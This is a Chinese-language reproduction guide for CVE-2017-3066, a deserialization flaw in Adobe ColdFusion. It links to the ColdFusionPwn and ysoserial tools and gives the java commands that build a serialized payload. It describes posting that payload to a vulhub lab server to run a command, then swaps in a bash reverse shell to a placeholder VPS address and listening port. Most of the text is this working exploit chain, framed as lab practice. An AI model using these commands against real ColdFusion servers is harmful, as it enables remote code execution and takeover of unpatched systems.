【CVE-2017-3066】Adobe ColdFusion 反序列化

​隐患名称	Adobe ColdFusion 反序列化
威胁等级	高
影响范围	Adobe ColdFusion (2016 release) Update 3及之前的版本 ColdFusion 11 Update 11及之前的版本 ColdFusion 10 Update 22及之前的版本

参考资料：

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3066

下载链接：https://github.com/codewhitesec/ColdFusionPwn （这个是源码）

下载链接：（jar包）https://jitpack.io/com/github/frohoff/ysoserial/master-30099844c6-1/ysoserial-master-30099844c6-1.jar

下载链接：（jar包）https://github-production-release-asset-2e65be.s3.amazonaws.com/124920554/c78080be-261d-11e8-97f4-80ae25cc0cd9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20191012%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20191012T055719Z&X-Amz-Expires=300&X-Amz-Signature=a194709cb8194213e98fe5ea167cf15d6e219ff294d98c9d16dc31b71fcae708&X-Amz-SignedHeaders=host&actor_id=34497947&response-content-disposition=attachment%3B%20filename%3DColdFusionPwn-0.0.1-SNAPSHOT-all.jar&response-content-type=application%2Foctet-stream

漏洞复现：

使用vulhub创建环境后：

访问http://your-ip:8500/CFIDE/administrator/index.cfm，输入密码vulhub，即可成功安装Adobe ColdFusion。

用ColdFusionPwn生成POC：

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-30099844c6-1.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

标记部分是执行的命令

这个在Win10下面复现失败了，在linux下面成功了：

 

POC的内容在这个文件中（打开会有部分乱码正常），我们将这个内容作为数据包的post数据发送过去：

虽然返回200，但是这样是不成功的！

正确姿势：

再添加http头部：

再次发送：

进入容器中，发现/tmp/success已成功创建：

为了下次使用方便，这里将这个数据包导出：

使用的时候需要根据实际情况修改host。

如果要生成EXP,这里修改生成POC时的命令来生成EXP进行反弹SHELL：

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-30099844c6-1.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -i >& /dev/tcp/VPSIP/监听端口 0>&1' exp.ser

这里反弹一个bash  shell:

VPS进行监听：

方法和上面相同：